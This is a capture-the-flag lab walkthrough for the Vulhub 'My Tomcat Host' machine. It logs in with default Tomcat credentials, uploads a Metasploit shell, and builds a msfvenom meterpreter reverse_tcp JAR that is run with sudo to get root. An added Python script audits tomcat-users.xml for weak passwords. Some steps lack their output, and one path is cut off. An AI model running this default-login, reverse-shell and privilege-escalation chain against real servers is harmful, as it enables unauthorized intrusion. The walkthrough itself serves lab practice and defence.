Vulhub – My Tomcat Host Walkthrough

Scanning the host with nmap -A -T4 -p-

And with dirb

We can access the page using the default credentials tomcat:tomcat

OK, now that we can log in, we can use msfconsole to upload a shell with exploit/multi/http/tomcat_mgr_upload
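
From the defender's side, the default tomcat:tomcat login used above can be caught by auditing conf/tomcat-users.xml for guessable passwords on accounts that hold a Manager deploy role. The Python below is an added example, not part of the original walkthrough; the weak-password list and the sample XML are constructed assumptions.

```python
import xml.etree.ElementTree as ET

# Roles that allow deploying applications through the Tomcat Manager
# ("manager" is the legacy single role from Tomcat 6).
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager"}

# Constructed short list of commonly guessed passwords (assumption; extend it).
WEAK_PASSWORDS = {"tomcat", "admin", "manager", "password", "s3cret", "changeit", ""}

# Constructed sample input, not taken from the target in this walkthrough.
SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Xq7!vR2#pL9zKd" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
</tomcat-users>
"""

def local(tag):
    """Strip the XML namespace so namespaced and plain files both match."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text):
    """Return findings for accounts with guessable plaintext passwords."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local(el.tag) != "user":
            continue
        # Tomcat also accepts the older name= attribute in place of username=.
        user = el.get("username") or el.get("name") or ""
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        weak = password.lower() in WEAK_PASSWORDS or password.lower() == user.lower()
        if not weak:
            continue
        # A weak password matters most when the account can deploy a WAR.
        can_deploy = bool(roles & DEPLOY_ROLES)
        findings.append({
            "user": user,
            "severity": "critical" if can_deploy else "medium",
            "roles": sorted(roles),
        })
    # "critical" sorts before "medium", so deploy-capable accounts come first.
    return sorted(findings, key=lambda f: f["severity"])

if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE):
        print(f"{f['severity']:8} user={f['user']} roles={','.join(f['roles'])}")
```

If the realm is configured to store digested passwords, the password attribute holds a hash and this plaintext comparison no longer applies.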

OK, now running the script gave me a lot of information:

We’re going to create a JAR exploit like this:

msfvenom -p java/meterpreter/reverse_tcp LHOST= LPORT=3333 -f raw -o exploit.jar

Then transfer the file to the target and run this command:

sudo /usr/lib/jvm/java-1.8.0-openjdk- -jar exploit.jar

And we get a shell as root

Navigate to the root folder and catch the flag:
